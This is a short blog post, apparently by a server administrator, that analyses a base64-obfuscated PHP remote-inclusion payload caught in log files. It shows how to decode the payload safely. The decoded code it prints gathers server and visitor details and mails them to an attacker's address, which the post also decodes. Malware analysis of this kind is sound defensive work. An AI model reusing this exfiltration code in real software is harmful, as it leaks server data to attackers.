Flattr this!

Foreword – Note that none of our servers are vulnerable to remote inclusion attacks.

For the most part, most of the exploits I covered in yesterdays post are common garden php vulnerability scans.
Some of them are more interesting though, although more for being encrypted, than anything else.

If I take an example from our log files:

This returns an encrypted string.
Its fairly easy to see whats been returned in that, merely by changing the eval to an echo.

//Edited slightly for width purposes
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".


//To stop execution, and merely see the script contents we echo it, instead of eval..
echo (base64_decode($lmge));

This returns this:


$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."";
mail( $creator, $subj, $msg, $from);

So in this case we can see the attacker wants us to email him our server details, what url worked for the exploit, and a few various php details.

If we look at the email account he wants to email to we can see its a google account.

echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   //returns

Google has been notified about that account.
All in all, slightly more interesting than the usual!